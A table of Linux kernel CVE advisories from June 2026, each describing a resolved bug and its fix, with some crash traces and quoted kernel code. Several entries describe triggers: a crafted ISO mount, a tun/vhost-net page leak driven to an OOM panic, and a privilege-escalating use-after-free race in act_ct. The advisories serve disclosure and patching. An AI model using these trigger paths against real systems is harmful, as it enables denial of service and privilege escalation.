| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix iova-to-va conversion for MR page sizes != PAGE_SIZE The current implementation incorrectly handles memory regions (MRs) with page sizes different from the system PAGE_SIZE. The core issue is that rxe_set_page() is called with mr->page_size step increments, but the page_list stores individual struct page pointers, each representing PAGE_SIZE of memory. ib_sg_to_page() has ensured that when i>=1 either a) SG[i-1].dma_end and SG[i].dma_addr are contiguous or b) SG[i-1].dma_end and SG[i].dma_addr are mr->page_size aligned. This leads to incorrect iova-to-va conversion in scenarios: 1) page_size < PAGE_SIZE (e.g., MR: 4K, system: 64K): ibmr->iova = 0x181800 sg[0]: dma_addr=0x181800, len=0x800 sg[1]: dma_addr=0x173000, len=0x1000 Access iova = 0x181800 + 0x810 = 0x182010 Expected VA: 0x173010 (second SG, offset 0x10) Before fix: - index = (0x182010 >> 12) - (0x181800 >> 12) = 1 - page_offset = 0x182010 & 0xFFF = 0x10 - xarray[1] stores system page base 0x170000 - Resulting VA: 0x170000 + 0x10 = 0x170010 (wrong) 2) page_size > PAGE_SIZE (e.g., MR: 64K, system: 4K): ibmr->iova = 0x18f800 sg[0]: dma_addr=0x18f800, len=0x800 sg[1]: dma_addr=0x170000, len=0x1000 Access iova = 0x18f800 + 0x810 = 0x190010 Expected VA: 0x170010 (second SG, offset 0x10) Before fix: - index = (0x190010 >> 16) - (0x18f800 >> 16) = 1 - page_offset = 0x190010 & 0xFFFF = 0x10 - xarray[1] stores system page for dma_addr 0x170000 - Resulting VA: system page of 0x170000 + 0x10 = 0x170010 (wrong) Yi Zhang reported a kernel panic[1] years ago related to this defect. Solution: 1. Replace xarray with pre-allocated rxe_mr_page array for sequential indexing (all MR page indices are contiguous) 2. Each rxe_mr_page stores both struct page* and offset within the system page 3. Handle MR page_size != PAGE_SIZE relationships: - page_size > PAGE_SIZE: Split MR pages into multiple system pages - page_size <= PAGE_SIZE: Store offset within system page 4. Add boundary checks and compatibility validation This ensures correct iova-to-va conversion regardless of MR page size and system PAGE_SIZE relationship, while improving performance through array-based sequential access. Tests on 4K and 64K PAGE_SIZE hosts: - rdma-core/pytests $ ./build/bin/run_tests.py --dev eth0_rxe - blktest: $ TIMEOUT=30 QUICK_RUN=1 USE_RXE=1 NVMET_TRTYPES=rdma ./check nvme srp rnbd [1] https://lore.kernel.org/all/CAHj4cs9XRqE25jyVw9rj9YugffLn5+f=1znaBEnu1usLOciD+g@mail.gmail.com/T/ | 2026-06-09 | 9.8 | CVE-2026-46325 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix use-after-free in of_unittest_changeset() The variable 'parent' is assigned the value of 'nchangeset' earlier in the function, meaning both point to the same struct device_node. The call to of_node_put(nchangeset) can decrement the reference count to zero and free the node if there are no other holders. After that, the code still uses 'parent' to check for the presence of a property and to read a string property, leading to a use-after-free. Fix this by moving the of_node_put() call after the last access to 'parent', avoiding the UAF. | 2026-06-08 | 8.4 | CVE-2026-46288 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isofs: validate Rock Ridge CE continuation extent against volume size rock_continue() reads rs->cont_extent verbatim from the Rock Ridge CE record and passes it to sb_bread() without checking that the block number is within the mounted ISO 9660 volume. commit e595447e177b ("[PATCH] rock.c: handle corrupted directories") added cont_offset and cont_size rejection for the CE continuation but did not validate the extent block number itself. commit f54e18f1b831 ("isofs: Fix infinite looping over CE entries") later capped the CE chain length at RR_MAX_CE_ENTRIES = 32 but again left the block number unchecked. With a crafted ISO mounted via udisks2 (desktop optical auto-mount) or via CAP_SYS_ADMIN mount, rs->cont_extent can therefore point at an out-of-range block or at blocks belonging to an adjacent filesystem on the same block device. sb_bread() on an out-of-range block returns NULL cleanly via the block layer EIO path, so there is no memory-safety violation. For in-range reads of adjacent- filesystem data, the CE buffer is parsed as Rock Ridge records and only the text of SL sub-records reaches userspace through readlink(), which makes the info-leak channel narrow and difficult to exploit; still, rejecting the malformed CE outright matches the rejection shape already present in the same function for cont_offset and cont_size. Add an ISOFS_SB(sb)->s_nzones bounds check to rock_continue() next to the existing offset/size rejection, printing the same corrupted-directory-entry notice. | 2026-06-08 | 8.2 | CVE-2026-46303 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath5k: do not access array OOB Vincent reports: > The ath5k driver seems to do an array-index-out-of-bounds access as > shown by the UBSAN kernel message: > UBSAN: array-index-out-of-bounds in drivers/net/wireless/ath/ath5k/base.c:1741:20 > index 4 is out of range for type 'ieee80211_tx_rate [4]' > ... > Call Trace: > <TASK> > dump_stack_lvl+0x5d/0x80 > ubsan_epilogue+0x5/0x2b > __ubsan_handle_out_of_bounds.cold+0x46/0x4b > ath5k_tasklet_tx+0x4e0/0x560 [ath5k] > tasklet_action_common+0xb5/0x1c0 It is real. 'ts->ts_final_idx' can be 3 on 5212, so: info->status.rates[ts->ts_final_idx + 1].idx = -1; with the array defined as: struct ieee80211_tx_rate rates[IEEE80211_TX_MAX_RATES]; while the size is: #define IEEE80211_TX_MAX_RATES 4 is indeed bogus. Set this 'idx = -1' sentinel only if the array index is less than the array size. As mac80211 will not look at rates beyond the size (IEEE80211_TX_MAX_RATES). Note: The effect of the OOB write is negligible. It just overwrites the next member of info->status, i.e. ack_signal. | 2026-06-08 | 8.3 | CVE-2026-46307 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Reassign nested_mmus array behind mmu_lock kvm->arch.nested_mmus[] is walked under kvm->mmu_lock, including from the MMU notifier path (kvm_unmap_gfn_range() -> kvm_nested_s2_unmap()), which can run at any time. kvm_vcpu_init_nested() reallocates the array and frees the old buffer while holding only kvm->arch.config_lock, so such a walker can reference the freed array. Allocate the new array outside of mmu_lock, as the allocation can sleep. Under the lock, copy the existing entries, fix up the back pointers and reassign the array. Free the old buffer after dropping the lock, as kvfree() can sleep as well. | 2026-06-09 | 8.8 | CVE-2026-46317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: pressure: mprls0025pa: fix spi_transfer struct initialisation Make sure that the spi_transfer struct is zeroed out before use. | 2026-06-09 | 8.4 | CVE-2026-46326 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: greybus: gb-beagleplay: bound bootloader receive buffering cc1352_bootloader_rx() appends each serdev chunk into the fixed rx_buffer before parsing bootloader packets. The helper can keep leftover bytes between callbacks and may receive multiple packets in one callback, so a single count value is not constrained by one packet length. Check that the incoming chunk fits in the remaining receive buffer space before memcpy(). If it does not, drop the staged data and consume the bytes instead of overflowing rx_buffer. | 2026-06-09 | 8 | CVE-2026-46332 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io-wq: check that the predecessor is hashed in io_wq_remove_pending() io_wq_remove_pending() needs to fix up wq->hash_tail[] if the cancelled work was the tail of its hash bucket. When doing this, it checks whether the preceding entry in acct->work_list has the same hash value, but never checks that the predecessor is hashed at all. io_get_work_hash() is simply atomic_read(&work->flags) >> IO_WQ_HASH_SHIFT, and the hash bits are never set for non-hashed work, so it returns 0. Thus, when a hashed bucket-0 work is cancelled while a non-hashed work is its list predecessor, the check spuriously passes and a pointer to the non-hashed io_kiocb is stored in wq->hash_tail[0]. Because non-hashed work is dequeued via the fast path in io_get_next_work(), which never touches hash_tail[], the stale pointer is never cleared. Therefore, after the non-hashed io_kiocb completes and is freed back to req_cachep, wq->hash_tail[0] is a dangling pointer. The io_wq is per-task (tctx->io_wq) and survives ring open/close, so the dangling pointer persists for the lifetime of the task; the next hashed bucket-0 enqueue dereferences it in io_wq_insert_work() and wq_list_add_after() writes through freed memory. Add the missing io_wq_is_hashed() check so a non-hashed predecessor never inherits a hash_tail[] slot. | 2026-06-08 | 7.8 | CVE-2026-46274 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_uart: fix UAFs and race conditions in close and init paths Vulnerabilities leading to Use-After-Free (UAF) and Null Pointer Dereference (NPD) conditions were observed in the lifecycle management of hci_uart. The primary issue arises because the workqueues (init_ready and write_work) are only flushed/cancelled if the HCI_UART_PROTO_READY flag is set during TTY close. If a hangup occurs before setup completes, hci_uart_tty_close() skips the teardown of these workqueues and proceeds to free the `hu` struct. When the scheduled work executes later, it blindly dereferences the freed `hu` struct. Furthermore, several data races and UAFs were identified in the teardown sequence: 1. Calling hci_uart_flush() from hci_uart_close() without effectively disabling write_work causes a race condition where both can concurrently double-free hu->tx_skb. This happens because protocol timers can concurrently invoke hci_uart_tx_wakeup() and requeue write_work. 2. Calling hci_free_dev(hdev) before hu->proto->close(hu) causes a UAF when vendor specific protocol close callbacks dereference hu->hdev. 3. In the initialization error paths, failing to take the proto_lock write lock before clearing PROTO_READY leads to races with active readers. Additionally, hci_uart_tty_receive() accesses hu->hdev outside the read lock, leading to UAFs if the initialization error path frees hdev concurrently. Fix these synchronization and lifecycle issues by: 1. Re-ordering hci_uart_tty_close() to clear HCI_UART_PROTO_READY first, followed immediately by a cancel_work_sync(&hu->write_work). Clearing the flag locks out concurrent protocol timers from successfully invoking hci_uart_tx_wakeup(), effectively rendering the cancellation permanent and preventing the tx_skb double-free. 2. Note: Clearing PROTO_READY early causes hci_uart_close() to skip hu->proto->flush(). This is perfectly safe in the tty_close path because hu->proto->close() executes shortly after, which intrinsically purges all protocol SKB queues and tears down the state. 3. Relocating hu->proto->close(hu) strictly prior to hci_free_dev(hdev) across all close and error paths to prevent vendor-level UAFs. 4. Moving the hdev->stat.byte_rx increment in hci_uart_tty_receive() inside the proto_lock read-side critical section to safely synchronize with device unregistration. 5. Adding cancel_work_sync(&hu->write_work) to hci_uart_close() to safely flush the workqueue before hci_uart_flush() is invoked via the HCI core. 6. Utilizing cancel_work_sync() instead of disable_work_sync() across all paths to prevent permanently breaking user-space retry capabilities. | 2026-06-08 | 7.8 | CVE-2026-46275 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/zone_device: do not touch device folio after calling ->folio_free() The contents of a device folio can immediately change after calling ->folio_free(), as the folio may be reallocated by a driver with a different order. Instead of touching the folio again to extract the pgmap, use the local stack variable when calling percpu_ref_put_many(). | 2026-06-08 | 7.8 | CVE-2026-46277 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib: test_hmm: evict device pages on file close to avoid use-after-free Patch series "Minor hmm_test fixes and cleanups". Two bugfixes a cleanup for the HMM kernel selftests. These were mostly reported by Zenghui Yu with special thanks to Lorenzo for analysing and pointing out the problems. This patch (of 3): When dmirror_fops_release() is called it frees the dmirror struct but doesn't migrate device private pages back to system memory first. This leaves those pages with a dangling zone_device_data pointer to the freed dmirror. If a subsequent fault occurs on those pages (eg. during coredump) the dmirror_devmem_fault() callback dereferences the stale pointer causing a kernel panic. This was reported [1] when running mm/ksft_hmm.sh on arm64, where a test failure triggered SIGABRT and the resulting coredump walked the VMAs faulting in the stale device private pages. Fix this by calling dmirror_device_evict_chunk() for each devmem chunk in dmirror_fops_release() to migrate all device private pages back to system memory before freeing the dmirror struct. The function is moved earlier in the file to avoid a forward declaration. | 2026-06-08 | 7.8 | CVE-2026-46280 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix held lock freed on hfsplus_fill_super() hfsplus_fill_super() calls hfs_find_init() to initialize a search structure, which acquires tree->tree_lock. If the subsequent call to hfsplus_cat_build_key() fails, the function jumps to the out_put_root error label without releasing the lock. The later cleanup path then frees the tree data structure with the lock still held, triggering a held lock freed warning. Fix this by adding the missing hfs_find_exit(&fd) call before jumping to the out_put_root error label. This ensures that tree->tree_lock is properly released on the error path. The bug was originally detected on v6.13-rc1 using an experimental static analysis tool we are developing, and we have verified that the issue persists in the latest mainline kernel. The tool is specifically designed to detect memory management issues. It is currently under active development and not yet publicly available. We confirmed the bug by runtime testing under QEMU with x86_64 defconfig, lockdep enabled, and CONFIG_HFSPLUS_FS=y. To trigger the error path, we used GDB to dynamically shrink the max_unistr_len parameter to 1 before hfsplus_asc2uni() is called. This forces hfsplus_asc2uni() to naturally return -ENAMETOOLONG, which propagates to hfsplus_cat_build_key() and exercises the faulty error path. The following warning was observed during mount: ========================= WARNING: held lock freed! 7.0.0-rc3-00016-gb4f0dd314b39 #4 Not tainted ------------------------- mount/174 is freeing memory ffff888103f92000-ffff888103f92fff, with a lock still held there! ffff888103f920b0 (&tree->tree_lock){+.+.}-{4:4}, at: hfsplus_find_init+0x154/0x1e0 2 locks held by mount/174: #0: ffff888103f960e0 (&type->s_umount_key#42/1){+.+.}-{4:4}, at: alloc_super.constprop.0+0x167/0xa40 #1: ffff888103f920b0 (&tree->tree_lock){+.+.}-{4:4}, at: hfsplus_find_init+0x154/0x1e0 stack backtrace: CPU: 2 UID: 0 PID: 174 Comm: mount Not tainted 7.0.0-rc3-00016-gb4f0dd314b39 #4 PREEMPT(lazy) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x82/0xd0 debug_check_no_locks_freed+0x13a/0x180 kfree+0x16b/0x510 ? hfsplus_fill_super+0xcb4/0x18a0 hfsplus_fill_super+0xcb4/0x18a0 ? __pfx_hfsplus_fill_super+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? bdev_open+0x65f/0xc30 ? srso_return_thunk+0x5/0x5f ? pointer+0x4ce/0xbf0 ? trace_contention_end+0x11c/0x150 ? __pfx_pointer+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? bdev_open+0x79b/0xc30 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? vsnprintf+0x6da/0x1270 ? srso_return_thunk+0x5/0x5f ? __mutex_unlock_slowpath+0x157/0x740 ? __pfx_vsnprintf+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? mark_held_locks+0x49/0x80 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? irqentry_exit+0x17b/0x5e0 ? trace_irq_disable.constprop.0+0x116/0x150 ? __pfx_hfsplus_fill_super+0x10/0x10 ? __pfx_hfsplus_fill_super+0x10/0x10 get_tree_bdev_flags+0x302/0x580 ? __pfx_get_tree_bdev_flags+0x10/0x10 ? vfs_parse_fs_qstr+0x129/0x1a0 ? __pfx_vfs_parse_fs_qstr+0x3/0x10 vfs_get_tree+0x89/0x320 fc_mount+0x10/0x1d0 path_mount+0x5c5/0x21c0 ? __pfx_path_mount+0x10/0x10 ? trace_irq_enable.constprop.0+0x116/0x150 ? trace_irq_enable.constprop.0+0x116/0x150 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? kmem_cache_free+0x307/0x540 ? user_path_at+0x51/0x60 ? __x64_sys_mount+0x212/0x280 ? srso_return_thunk+0x5/0x5f __x64_sys_mount+0x212/0x280 ? __pfx___x64_sys_mount+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? trace_irq_enable.constprop.0+0x116/0x150 ? srso_return_thunk+0x5/0x5f do_syscall_64+0x111/0x680 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ffacad55eae Code: 48 8b 0d 85 1f 0f 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 a5 00 00 8 RSP: 002b ---truncated--- | 2026-06-08 | 7 | CVE-2026-46299 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet: avoid recursive nvmet-wq flush in nvmet_ctrl_free nvmet_tcp_release_queue_work() runs on nvmet-wq and can drop the final controller reference through nvmet_cq_put(). If that triggers nvmet_ctrl_free(), the teardown path flushes ctrl->async_event_work on the same nvmet-wq. Call chain: nvmet_tcp_schedule_release_queue() kref_put(&queue->kref, nvmet_tcp_release_queue) nvmet_tcp_release_queue() queue_work(nvmet_wq, &queue->release_work) <--- nvmet_wq process_one_work() nvmet_tcp_release_queue_work() nvmet_cq_put(&queue->nvme_cq) nvmet_cq_destroy() nvmet_ctrl_put(cq->ctrl) nvmet_ctrl_free() flush_work(&ctrl->async_event_work) <--- nvmet_wq Previously Scheduled by :- nvmet_add_async_event queue_work(nvmet_wq, &ctrl->async_event_work); This trips lockdep with a possible recursive locking warning. [ 5223.015876] run blktests nvme/003 at 2026-04-07 20:53:55 [ 5223.061801] loop0: detected capacity change from 0 to 2097152 [ 5223.072206] nvmet: adding nsid 1 to subsystem blktests-subsystem-1 [ 5223.088368] nvmet_tcp: enabling port 0 (127.0.0.1:4420) [ 5223.126086] nvmet: Created discovery controller 1 for subsystem nqn.2014-08.org.nvmexpress.discovery for NQN nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349. [ 5223.128453] nvme nvme1: new ctrl: NQN "nqn.2014-08.org.nvmexpress.discovery", addr 127.0.0.1:4420, hostnqn: nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349 [ 5233.199447] nvme nvme1: Removing ctrl: NQN "nqn.2014-08.org.nvmexpress.discovery" [ 5233.227718] ============================================ [ 5233.231283] WARNING: possible recursive locking detected [ 5233.234696] 7.0.0-rc3nvme+ #20 Tainted: G O N [ 5233.238434] -------------------------------------------- [ 5233.241852] kworker/u192:6/2413 is trying to acquire lock: [ 5233.245429] ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: touch_wq_lockdep_map+0x26/0x90 [ 5233.251438] but task is already holding lock: [ 5233.255254] ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: process_one_work+0x5cc/0x6e0 [ 5233.261125] other info that might help us debug this: [ 5233.265333] Possible unsafe locking scenario: [ 5233.269217] CPU0 [ 5233.270795] ---- [ 5233.272436] lock((wq_completion)nvmet-wq); [ 5233.275241] lock((wq_completion)nvmet-wq); [ 5233.278020] *** DEADLOCK *** [ 5233.281793] May be due to missing lock nesting notation [ 5233.286195] 3 locks held by kworker/u192:6/2413: [ 5233.289192] #0: ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: process_one_work+0x5cc/0x6e0 [ 5233.294569] #1: ffffc9000e2a7e40 ((work_completion)(&queue->release_work)){+.+.}-{0:0}, at: process_one_work+0x1c5/0x6e0 [ 5233.300128] #2: ffffffff82d7dc40 (rcu_read_lock){....}-{1:3}, at: __flush_work+0x62/0x530 [ 5233.304290] stack backtrace: [ 5233.306520] CPU: 4 UID: 0 PID: 2413 Comm: kworker/u192:6 Tainted: G O N 7.0.0-rc3nvme+ #20 PREEMPT(full) [ 5233.306524] Tainted: [O]=OOT_MODULE, [N]=TEST [ 5233.306525] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 5233.306527] Workqueue: nvmet-wq nvmet_tcp_release_queue_work [nvmet_tcp] [ 5233.306532] Call Trace: [ 5233.306534] <TASK> [ 5233.306536] dump_stack_lvl+0x73/0xb0 [ 5233.306552] print_deadlock_bug+0x225/0x2f0 [ 5233.306556] __lock_acquire+0x13f0/0x2290 [ 5233.306563] lock_acquire+0xd0/0x300 [ 5233.306565] ? touch_wq_lockdep_map+0x26/0x90 [ 5233.306571] ? __flush_work+0x20b/0x530 [ 5233.306573] ? touch_wq_lockdep_map+0x26/0x90 [ 5233.306577] touch_wq_lockdep_map+0x3b/0x90 [ 5233.306580] ? touch_wq_lockdep_map+0x26/0x90 [ 52 ---truncated--- | 2026-06-08 | 7.5 | CVE-2026-46304 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: flow_dissector: do not dissect PPPoE PFC frames RFC 2516 Section 7 states that Protocol Field Compression (PFC) is NOT RECOMMENDED for PPPoE. In practice, pppd does not support negotiating PFC for PPPoE sessions, and the flow dissector driver has assumed an uncompressed frame until the blamed commit. During the review process of that commit [1], support for PFC is suggested. However, having a compressed (1-byte) protocol field means the subsequent PPP payload is shifted by one byte, causing 4-byte misalignment for the network header and an unaligned access exception on some architectures. The exception can be reproduced by sending a PPPoE PFC frame to an ethernet interface of a MIPS board, with RPS enabled, even if no PPPoE session is active on that interface: $ 0 : 00000000 80c40000 00000000 85144817 $ 4 : 00000008 00000100 80a75758 81dc9bb8 $ 8 : 00000010 8087ae2c 0000003d 00000000 $12 : 000000e0 00000039 00000000 00000000 $16 : 85043240 80a75758 81dc9bb8 00006488 $20 : 0000002f 00000007 85144810 80a70000 $24 : 81d1bda0 00000000 $28 : 81dc8000 81dc9aa8 00000000 805ead08 Hi : 00009d51 Lo : 2163358a epc : 805e91f0 __skb_flow_dissect+0x1b0/0x1b50 ra : 805ead08 __skb_get_hash_net+0x74/0x12c Status: 11000403 KERNEL EXL IE Cause : 40800010 (ExcCode 04) BadVA : 85144817 PrId : 0001992f (MIPS 1004Kc) Call Trace: [<805e91f0>] __skb_flow_dissect+0x1b0/0x1b50 [<805ead08>] __skb_get_hash_net+0x74/0x12c [<805ef330>] get_rps_cpu+0x1b8/0x3fc [<805fca70>] netif_receive_skb_list_internal+0x324/0x364 [<805fd120>] napi_complete_done+0x68/0x2a4 [<8058de5c>] mtk_napi_rx+0x228/0xfec [<805fd398>] __napi_poll+0x3c/0x1c4 [<805fd754>] napi_threaded_poll_loop+0x234/0x29c [<805fd848>] napi_threaded_poll+0x8c/0xb0 [<80053544>] kthread+0x104/0x12c [<80002bd8>] ret_from_kernel_thread+0x14/0x1c Code: 02d51821 1060045b 00000000 <8c640000> 3084000f 2c820005 144001a2 00042080 8e220000 To reduce the attack surface and maintain performance, do not process PPPoE PFC frames. [1] https://lore.kernel.org/r/20220630231016.GA392@debian.home | 2026-06-08 | 7.5 | CVE-2026-46306 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/userq: fix access to stale wptr mapping Use drm_exec to take both locks i.e vm root bo and wptr_obj bo to access the mapping data properly. This fixes the security issue of unmap the wptr_obj while a queue creation is in progress and passing other bo at same address. (cherry picked from commit 1fc6c8ab45dbee096469c08c13f6099d57a52d6c) | 2026-06-08 | 7.8 | CVE-2026-46311 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_ct: Only release RCU read lock after ct_ft When looking up a flow table in act_ct in tcf_ct_flow_table_get(), rhashtable_lookup_fast() internally opens and closes an RCU read critical section before returning ct_ft. The tcf_ct_flow_table_cleanup_work() can complete before refcount_inc_not_zero() is invoked on the returned ct_ft resulting in a UAF on the already freed ct_ft object. This vulnerability can lead to privilege escalation. Analysis from zdi-disclosures@trendmicro.com: When initializing act_ct, tcf_ct_init() is called, which internally triggers tcf_ct_flow_table_get(). static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params) { struct zones_ht_key key = { .net = net, .zone = params->zone }; struct tcf_ct_flow_table *ct_ft; int err = -ENOMEM; mutex_lock(&zones_mutex); ct_ft = rhashtable_lookup_fast(&zones_ht, &key, zones_params); // [1] if (ct_ft && refcount_inc_not_zero(&ct_ft->ref)) // [2] goto out_unlock; ... } static __always_inline void *rhashtable_lookup_fast( struct rhashtable *ht, const void *key, const struct rhashtable_params params) { void *obj; rcu_read_lock(); obj = rhashtable_lookup(ht, key, params); rcu_read_unlock(); return obj; } At [1], rhashtable_lookup_fast() looks up and returns the corresponding ct_ft from zones_ht . The lookup is performed within an RCU read critical section through rcu_read_lock() / rcu_read_unlock(), which prevents the object from being freed. However, at the point of function return, rcu_read_unlock() has already been called, and there is nothing preventing ct_ft from being freed before reaching refcount_inc_not_zero(&ct_ft->ref) at [2]. This interval becomes the race window, during which ct_ft can be freed. Free Process: tcf_ct_flow_table_put() is executed through the path tcf_ct_cleanup() call_rcu() tcf_ct_params_free_rcu() tcf_ct_params_free() tcf_ct_flow_table_put(). static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft) { if (refcount_dec_and_test(&ct_ft->ref)) { rhashtable_remove_fast(&zones_ht, &ct_ft->node, zones_params); INIT_RCU_WORK(&ct_ft->rwork, tcf_ct_flow_table_cleanup_work); // [3] queue_rcu_work(act_ct_wq, &ct_ft->rwork); } } At [3], tcf_ct_flow_table_cleanup_work() is scheduled as RCU work static void tcf_ct_flow_table_cleanup_work(struct work_struct *work) { struct tcf_ct_flow_table *ct_ft; struct flow_block *block; ct_ft = container_of(to_rcu_work(work), struct tcf_ct_flow_table, rwork); nf_flow_table_free(&ct_ft->nf_ft); block = &ct_ft->nf_ft.flow_block; down_write(&ct_ft->nf_ft.flow_block_lock); WARN_ON(!list_empty(&block->cb_list)); up_write(&ct_ft->nf_ft.flow_block_lock); kfree(ct_ft); // [4] module_put(THIS_MODULE); } tcf_ct_flow_table_cleanup_work() frees ct_ft at [4]. When this function executes between [1] and [2], UAF occurs. This race condition has a very short race window, making it generally difficult to trigger. Therefore, to trigger the vulnerability an msleep(100) was inserted after[1] | 2026-06-09 | 7.8 | CVE-2026-46319 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tap: free page on error paths in tap_get_user_xdp() tap_get_user_xdp() rejects a frame shorter than ETH_HLEN with -EINVAL, and returns -ENOMEM when build_skb() fails. Both paths jump to the err label without freeing the page that vhost_net_build_xdp() allocated for the frame. tap_sendmsg() discards the per-buffer return value and always returns 0, so vhost_tx_batch() takes the success path and never frees the page; each rejected frame in a batch leaks one page-frag chunk. Free the page on both error paths, before the skb is built. This is the tap counterpart of the same leak in tun_xdp_one(). | 2026-06-09 | 7.4 | CVE-2026-46320 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tun: free page on short-frame rejection in tun_xdp_one() tun_xdp_one() returns -EINVAL on a frame shorter than ETH_HLEN without freeing the page that vhost_net_build_xdp() allocated for it. tun_sendmsg() discards that -EINVAL and still returns total_len, so vhost_tx_batch() takes the success path and never frees the page; each short frame in a batch leaks one page-frag chunk. A local process that can open /dev/net/tun and /dev/vhost-net can hit this path: it attaches a tun/tap device as the vhost-net backend and feeds TX descriptors whose length minus the virtio-net header is below ETH_HLEN. Each kick leaks the page-frag chunks for that batch, and a tight submission loop exhausts host memory and triggers an OOM panic. Free the page before returning -EINVAL, matching the XDP-program error path in the same function. | 2026-06-09 | 7.1 | CVE-2026-46321 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tun: free page on build_skb failure in tun_xdp_one() When build_skb() fails in tun_xdp_one(), the function sets ret to -ENOMEM and jumps to the out label, which returns without freeing the page that vhost_net_build_xdp() allocated for the frame. As with the short-frame rejection path, tun_sendmsg() discards the per-buffer error and still returns total_len, so vhost_tx_batch() takes the success path and never frees the page. Each build_skb() failure in a batch leaks one page-frag chunk. Free the page before taking the error path, matching the put_page() the other error exits of tun_xdp_one() already perform. | 2026-06-09 | 7.1 | CVE-2026-46322 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: gro: don't merge zcopy skbs skb_gro_receive() can currently copy frags between the source and GRO skb, without checking the zerocopy status, and in particular the SKBFL_MANAGED_FRAG_REFS flag. When SKBFL_MANAGED_FRAG_REFS is set, the skb doesn't hold a reference on the pages in shinfo->frags. Appending those frags to another skb's frags without fixing up the page refcount can lead to UAF. When either the last skb in the GRO chain (the one we would append frags to) or the source skb is zerocopy, don't merge the skbs. | 2026-06-09 | 7.8 | CVE-2026-46323 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: use list_del_rcu for netlink hooks nft_netdev_unregister_hooks and __nft_unregister_flowtable_net_hooks need to use list_del_rcu(), this list can be walked by concurrent dumpers. Add a new helper and use it consistently. | 2026-06-09 | 7.8 | CVE-2026-46324 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix unlocked test for dm_suspended_md The function dm_blk_report_zones tests if the device is suspended with the "dm_suspended_md" call. However, this function is called without holding any locks, so the device may be suspended just after it. Move the call to dm_suspended_md after dm_get_live_table, so that the device can't be suspended after the suspended state was tested. | 2026-06-09 | 7.8 | CVE-2026-46327 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix rlimit for posix cpu timers Posix cpu timers requires an additional step beyond setting the rlimit. Refactor the code so its clear when what code is setting the limit and conditionally update the posix cpu timers when appropriate. | 2026-06-09 | 7.3 | CVE-2026-46328 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "net/smc: Introduce TCP ULP support" This reverts commit d7cd421da9da2cc7b4d25b8537f66db5c8331c40. As reported by Al Viro, the TCP ULP support for SMC is fundamentally broken. The implementation attempts to convert an active TCP socket into an SMC socket by modifying the underlying `struct file`, dentry, and inode in-place, which violates core VFS invariants that assume these structures are immutable for an open file, creating a risk of use after free errors and general system instability. Given the severity of this design flaw and the fact that cleaner alternatives (e.g., LD_PRELOAD, BPF) exist for legacy application transparency, the correct course of action is to remove this feature entirely. | 2026-06-09 | 7.8 | CVE-2026-46330 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p: fix access mode flags being ORed instead of replaced Since commit 1f3e4142c0eb ("9p: convert to the new mount API"), v9fs_apply_options() applies parsed mount flags with |= onto flags already set by v9fs_session_init(). For 9P2000.L, session_init sets V9FS_ACCESS_CLIENT as the default, so when the user mounts with "access=user", both bits end up set. Access mode checks compare against exact values, so having both bits set matches neither mode. This causes v9fs_fid_lookup() to fall through to the default switch case, using INVALID_UID (nobody/65534) instead of current_fsuid() for all fid lookups. Root is then unable to chown or perform other privileged operations. Fix by clearing the access mask before applying the user's choice. | 2026-06-09 | 7.7 | CVE-2026-52906 |
